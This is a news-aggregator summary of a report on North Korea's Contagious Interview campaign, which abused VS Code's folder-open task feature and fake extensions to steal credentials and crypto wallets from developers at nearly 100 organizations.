thehackernews.com web signal

North Korea Weaponizes VS Code to Hit Nearly 100 Orgs

cybersecurity coding tools supply-chain ai-security north-korea

Key insights

  • Contagious Interview has abused VS Code's 'runOn: folderOpen' feature since December 2025 to silently execute malware on project open.
  • The UNK_DeadDrop campaign sent over 250 phishing emails in six weeks, targeting nearly 100 organizations across finance, crypto, education, and tech.
  • One analysis attributed $12 million in cryptocurrency theft to North Korean operations in the first three months of 2026.

Why this matters

The folderOpen abuse technique turns a universal, daily developer action into a zero-click compromise vector, meaning traditional defenses built around suspicious attachments or manual execution are structurally blind to it. The breadth of sectors hit, spanning finance, cryptocurrency, education, and technology across ten countries, shows this is not a targeted espionage campaign but a wide-net financial extraction operation running at industrial scale. Security teams at developer-heavy organizations need to treat third-party VS Code extensions and GitHub-hosted project repositories as active threat surfaces, not just code-hosting conveniences.

Summary

North Korean hackers linked to the Contagious Interview group are systematically weaponizing developer tools, targeting nearly 100 organizations across finance, cryptocurrency, education, and technology in a campaign dubbed UNK_DeadDrop. The infection chain opens with recruitment and code-review-themed emails pointing to actor-controlled GitHub repositories hosting malicious scripts. The technique that sets this campaign apart: abusing Microsoft Visual Studio Code's "runOn: folderOpen" feature, adopted by the group since December 2025, to silently execute payloads the moment a developer opens a project folder. No suspicious attachment clicks required. Once inside, the attackers deploy VS Code extensions masquerading as Google services, enabling remote command execution, system reconnaissance, and credential and wallet data theft. Malware runs cross-platform across macOS, Linux, and Windows, with the open-source Go framework Overlord serving as part of the attack infrastructure. Essentially: (North Korea's Contagious Interview / UNK_DeadDrop) is running industrial-scale developer-targeted intrusions across the U.S. and nine other countries including the UK, Australia, France, and Germany. - Over 250 phishing emails sent across a six-week window, with more than 75% of targets U.S.-based. - One analysis cited theft of $12 million in cryptocurrency in the first three months of 2026 alone. - Broader North Korean supply-chain escalation includes malicious npm packages and AI-assisted malware loader development. The folderOpen abuse converts one of the most routine developer actions into an automatic compromise trigger, structurally bypassing most conventional endpoint defenses that key on executable launches or attachment opens.

Potential risks and opportunities

Risks

  • Developers at finance and crypto firms who opened any GitHub-linked VS Code project from an unknown recruiter since December 2025 may have already triggered the folderOpen payload without generating a detectable alert.
  • Microsoft faces pressure to restrict or redesign the 'runOn: folderOpen' VS Code feature; a rushed patch could disrupt legitimate CI/CD and devcontainer workflows used by large engineering teams.
  • AI-assisted malware loader development by Contagious Interview lowers the cost of campaign iteration, increasing the likelihood of rapid new variants before security vendors update signatures.

Opportunities

  • Developer security vendors such as Socket, Snyk, and Endor Labs can position repository-level malware scanning as a direct countermeasure to the GitHub-hosted payload distribution chain used in UNK_DeadDrop.
  • VS Code extension auditing and allowlisting tools gain clear budget justification at finance and crypto firms that appeared among the nearly 100 targeted organizations.
  • Threat intelligence platforms with North Korea-linked IOC feeds can surface the disclosed C2 infrastructure as an active indicator, creating immediate detection value for enterprise SOC teams at the over-75%-U.S.-based target pool.

What we don't know yet

  • Whether the malicious VS Code extensions masquerading as Google services have been removed from the VS Code Marketplace or remain available as of June 2026.
  • How many of the nearly 100 targeted organizations were successfully compromised versus merely phished -- the breach rate is not disclosed in public reporting.
  • Which specific malware families beyond the Overlord Go framework were deployed, and whether any variants remain undetected on affected developer systems.

Originally reported by thehackernews.com

Read the original article →

Original headline: North Korea's Contagious Interview Campaign Targeted 100 Organizations via VS Code, Cursor, and npm — $12M in Crypto Stolen, 26,584 Wallets Exfiltrated From Developer Systems